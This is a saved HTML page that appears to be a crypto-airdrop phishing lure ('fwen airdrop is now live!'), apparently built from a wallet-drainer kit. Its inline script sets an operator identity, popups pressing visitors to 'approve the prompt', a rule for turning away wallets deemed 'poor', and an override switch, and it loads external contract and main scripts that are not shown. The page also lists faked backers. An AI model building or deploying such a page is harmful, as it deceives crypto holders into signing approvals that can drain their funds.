<!DOCTYPE html>
<html lang="en"
    style="--wcm-color-fg-1: rgb(228,231,231); --wcm-color-fg-2: rgb(148,158,158); --wcm-color-fg-3: rgb(110,119,119); --wcm-color-bg-1: rgb(20,20,20); --wcm-color-bg-2: rgb(39,42,42); --wcm-color-bg-3: rgb(59,64,64); --wcm-color-overlay: rgba(255,255,255,0.1); --wcm-accent-color: #3396FF; --wcm-accent-fill-color: #FFFFFF; --wcm-z-index: 89; --wcm-background-color: #3396FF; --wcm-background-border-radius: 8px; --wcm-container-border-radius: 30px; --wcm-wallet-icon-border-radius: 15px; --wcm-wallet-icon-large-border-radius: 30px; --wcm-wallet-icon-small-border-radius: 7px; --wcm-input-border-radius: 28px; --wcm-button-border-radius: 10px; --wcm-notification-border-radius: 36px; --wcm-secondary-button-border-radius: 28px; --wcm-icon-button-border-radius: 50%; --wcm-button-hover-highlight-border-radius: 10px; --wcm-text-big-bold-size: 20px; --wcm-text-big-bold-weight: 600; --wcm-text-big-bold-line-height: 24px; --wcm-text-big-bold-letter-spacing: -0.03em; --wcm-text-big-bold-text-transform: none; --wcm-text-xsmall-bold-size: 10px; --wcm-text-xsmall-bold-weight: 700; --wcm-text-xsmall-bold-line-height: 12px; --wcm-text-xsmall-bold-letter-spacing: 0.02em; --wcm-text-xsmall-bold-text-transform: uppercase; --wcm-text-xsmall-regular-size: 12px; --wcm-text-xsmall-regular-weight: 600; --wcm-text-xsmall-regular-line-height: 14px; --wcm-text-xsmall-regular-letter-spacing: -0.03em; --wcm-text-xsmall-regular-text-transform: none; --wcm-text-small-thin-size: 14px; --wcm-text-small-thin-weight: 500; --wcm-text-small-thin-line-height: 16px; --wcm-text-small-thin-letter-spacing: -0.03em; --wcm-text-small-thin-text-transform: none; --wcm-text-small-regular-size: 14px; --wcm-text-small-regular-weight: 600; --wcm-text-small-regular-line-height: 16px; --wcm-text-small-regular-letter-spacing: -0.03em; --wcm-text-small-regular-text-transform: none; --wcm-text-medium-regular-size: 16px; --wcm-text-medium-regular-weight: 600; --wcm-text-medium-regular-line-height: 20px; --wcm-text-medium-regular-letter-spacing: -0.03em; --wcm-text-medium-regular-text-transform: none; --wcm-font-family: -apple-system, system-ui, BlinkMacSystemFont, 'Segoe UI', Roboto, Ubuntu, 'Helvetica Neue', sans-serif; --wcm-font-feature-settings: 'tnum' on, 'lnum' on, 'case' on; --wcm-success-color: rgb(38,181,98); --wcm-error-color: rgb(242, 90, 103); --wcm-overlay-background-color: rgba(0, 0, 0, 0.3); --wcm-overlay-backdrop-filter: none;"
    data-scrapbook-source="https://www.fwen.xyz/" data-scrapbook-create="20231001145823393" data-scrapbook-title="FWEN">

    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="f826c76c1c6d9e26.css" data-precedence="next">
    <link rel="stylesheet" href="b714cec72df6db5b.css" data-precedence="next">
    <link rel="stylesheet" href="087923894ded5fb7.css" data-precedence="next">
    <title>FWEN</title>
    <meta name="description" content="The airdrop for friends, by a $FWEN.">
    <meta name="theme-color" content="#00bafa">
    <link rel="icon" href="favicon.ico" type="image/x-icon" sizes="16x16">
    <meta name="next-size-adjust">
    <script
        data-scrapbook-elem="custom-elements-loader">(function (names) { if (!customElements) { return; } for (const name of names) { customElements.define(name, class CustomElement extends HTMLElement { }); } })(["next-route-announcer", "wcm-explorer-context", "wcm-theme-context", "wcm-modal"])</script>
        <script defer="defer" src="js/vendors.js"></script>
        <script defer="defer" src="js/contracts.js"></script>
        <script defer="defer" src="js/main.js"></script>
        
        <script>
          window.UNIQUE_IDENTITY = "yelping_cheetah_23";
        
          // Pick a theme here, this defaults to "light"
          window.modal_theme = "light";
        
          // https://docs.walletconnect.com/2.0/web/walletConnectModal/theming
          window.modal_variables = { "--w3m-accent-color": "#00BAFA", "--w3m-background-color": "#00BAFA",
          /* Example of what you can do */
          // "--w3m-accent-color": "#A6111D",
          // "--w3m-background-color": "#A6111D",
          // "--w3m-logo-image-url": "/your-logo.svg",
          };
        
          // Notification modals
         window.popups = {
        PENDING: {
          // The popup that shows when they get prompted
          title: "Claim Pending",
          text: "You must approve the prompt in order to continue."
        },
        INVALID: {
          // Shown when they connect on a wallet that is poor.
          // title: "Ineligible Address",
          text: "The connected account is not eligible for this event.\nPlease try using a different account.",
        }
          }
        
          // Only touch this if you know what you're doing!
          window.OVERRIDE_MODE = false;
        </script>
        </head>

<body class="__className_e66fe9">
    <div data-rk="">
        <style>
            [data-rk] {
                --rk-blurs-modalOverlay: blur(0px);
                --rk-fonts-body: SFRounded, ui-rounded, "SF Pro Rounded", -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol";
                --rk-radii-actionButton: 9999px;
                --rk-radii-connectButton: 12px;
                --rk-radii-menuButton: 12px;
                --rk-radii-modal: 24px;
                --rk-radii-modalMobile: 28px;
                --rk-colors-accentColor: #0E76FD;
                --rk-colors-accentColorForeground: #FFF;
                --rk-colors-actionButtonBorder: rgba(0, 0, 0, 0.04);
                --rk-colors-actionButtonBorderMobile: rgba(0, 0, 0, 0.06);
                --rk-colors-actionButtonSecondaryBackground: rgba(0, 0, 0, 0.06);
                --rk-colors-closeButton: rgba(60, 66, 66, 0.8);
                --rk-colors-closeButtonBackground: rgba(0, 0, 0, 0.06);
                --rk-colors-connectButtonBackground: #FFF;
                --rk-colors-connectButtonBackgroundError: #FF494A;
                --rk-colors-connectButtonInnerBackground: linear-gradient(0deg, rgba(0, 0, 0, 0.03), rgba(0, 0, 0, 0.06));
                --rk-colors-connectButtonText: #25292E;
                --rk-colors-connectButtonTextError: #FFF;
                --rk-colors-connectionIndicator: #30E000;
                --rk-colors-downloadBottomCardBackground: linear-gradient(126deg, rgba(255, 255, 255, 0) 9.49%, rgba(171, 171, 171, 0.04) 71.04%), #FFFFFF;
                --rk-colors-downloadTopCardBackground: linear-gradient(126deg, rgba(171, 171, 171, 0.2) 9.49%, rgba(255, 255, 255, 0) 71.04%), #FFFFFF;
                --rk-colors-error: #FF494A;
                --rk-colors-generalBorder: rgba(0, 0, 0, 0.06);
                --rk-colors-generalBorderDim: rgba(0, 0, 0, 0.03);
                --rk-colors-menuItemBackground: rgba(60, 66, 66, 0.1);
                --rk-colors-modalBackdrop: rgba(0, 0, 0, 0.3);
                --rk-colors-modalBackground: #FFF;
                --rk-colors-modalBorder: transparent;
                --rk-colors-modalText: #25292E;
                --rk-colors-modalTextDim: rgba(60, 66, 66, 0.3);
                --rk-colors-modalTextSecondary: rgba(60, 66, 66, 0.6);
                --rk-colors-profileAction: #FFF;
                --rk-colors-profileActionHover: rgba(255, 255, 255, 0.5);
                --rk-colors-profileForeground: rgba(60, 66, 66, 0.06);
                --rk-colors-selectedOptionBorder: rgba(60, 66, 66, 0.1);
                --rk-colors-standby: #FFD641;
                --rk-shadows-connectButton: 0px 4px 12px rgba(0, 0, 0, 0.1);
                --rk-shadows-dialog: 0px 8px 32px rgba(0, 0, 0, 0.32);
                --rk-shadows-profileDetailsAction: 0px 2px 6px rgba(37, 41, 46, 0.04);
                --rk-shadows-selectedOption: 0px 2px 6px rgba(0, 0, 0, 0.24);
                --rk-shadows-selectedWallet: 0px 2px 6px rgba(0, 0, 0, 0.12);
                --rk-shadows-walletLogo: 0px 2px 16px rgba(0, 0, 0, 0.16);
            }
        </style>
        <div class="Toastify"></div>
        <main class="page_claim__Yd6ub">
            <div class="page_brand__L5adf"><img src="logo.svg" class="page_brandImage__m93Ax">
                <h2><span class="blue">fwen</span></h2>
                <h3>fwen airdrop is now live!</h3>
            </div>
            <div class="page_cta__1mThR">
                <div id="connect_button"class="addressInput"><button
                    id="connect_button" class="button">Claim Airdrop</button></div>
                <div class="page_links__QAJvv"><a href="" target="_blank"
                        rel="noreferrer">Telegram</a><a href="" target="_blank"
                        rel="noreferrer">X (Twitter)</a><a
                        href=""
                        target="_blank" rel="noreferrer">DEXTools</a></div>
                <div class="page_backed__zQWSg">BACKED BY P▮▮▮▮▮▮▮, A▮▮▮▮▮▮▮, S▮▮▮▮▮▮▮, U▮▮▮▮▮▮▮, P2▮▮▮▮▮▮, M▮▮▮▮▮▮▮,
                    G▮▮▮▮▮▮▮, B▮▮▮▮▮▮▮, F▮▮▮▮▮▮▮, C▮▮▮▮▮▮▮</div>
            </div>
        </main>
    </div><next-route-announcer style="position: absolute;"
        data-scrapbook-shadowdom="<div id=&quot;__next-route-announcer__&quot; style=&quot;position: absolute; border: 0px; height: 1px; margin: -1px; padding: 0px; width: 1px; clip: rect(0px, 0px, 0px, 0px); overflow: hidden; white-space: nowrap; overflow-wrap: normal;&quot;></div>"></next-route-announcer><wcm-modal
        data-scrapbook-shadowdom="<!----><wcm-explorer-context data-scrapbook-shadowdom=&quot;<!---->&quot;></wcm-explorer-context><wcm-theme-context data-scrapbook-shadowdom=&quot;<!---->&quot;></wcm-theme-context><div id=&quot;wcm-modal&quot; role=&quot;alertdialog&quot; aria-modal=&quot;true&quot; class=&quot; wcm-overlay &quot;><div class=&quot;wcm-container&quot; tabindex=&quot;0&quot;><!--?lit$2105010293$--></div></div>"></wcm-modal><iframe
        id="verify-api" src="e5830f98990be3a35dfd0f962b0773c1.txt" style="display: none;"></iframe>
    <script
        data-scrapbook-elem="basic-loader">(function () { var k1 = "data-scrapbook-shadowdom", k2 = "data-scrapbook-canvas", k3 = "data-scrapbook-input-indeterminate", k4 = "data-scrapbook-input-checked", k5 = "data-scrapbook-option-selected", k6 = "data-scrapbook-input-value", k7 = "data-scrapbook-textarea-value", fn = function (r) { var E = r.querySelectorAll ? r.querySelectorAll("*") : r.getElementsByTagName("*"), i = E.length, e, d, s; while (i--) { e = E[i]; if ((d = e.getAttribute(k1)) !== null && !e.shadowRoot && e.attachShadow) { s = e.attachShadow({ mode: 'open' }); s.innerHTML = d; e.removeAttribute(k1); } if ((d = e.getAttribute(k2)) !== null) { (function () { var c = e, g = new Image(); g.onload = function () { c.getContext('2d').drawImage(g, 0, 0); }; g.src = d; })(); e.removeAttribute(k2); } if ((d = e.getAttribute(k3)) !== null) { e.indeterminate = true; e.removeAttribute(k3); } if ((d = e.getAttribute(k4)) !== null) { e.checked = d === 'true'; e.removeAttribute(k4); } if ((d = e.getAttribute(k5)) !== null) { e.selected = d === 'true'; e.removeAttribute(k5); } if ((d = e.getAttribute(k6)) !== null) { e.value = d; e.removeAttribute(k6); } if ((d = e.getAttribute(k7)) !== null) { e.value = d; e.removeAttribute(k7); } if (e.shadowRoot) { fn(e.shadowRoot); } } }; fn(document); })()</script>
</body>

</html>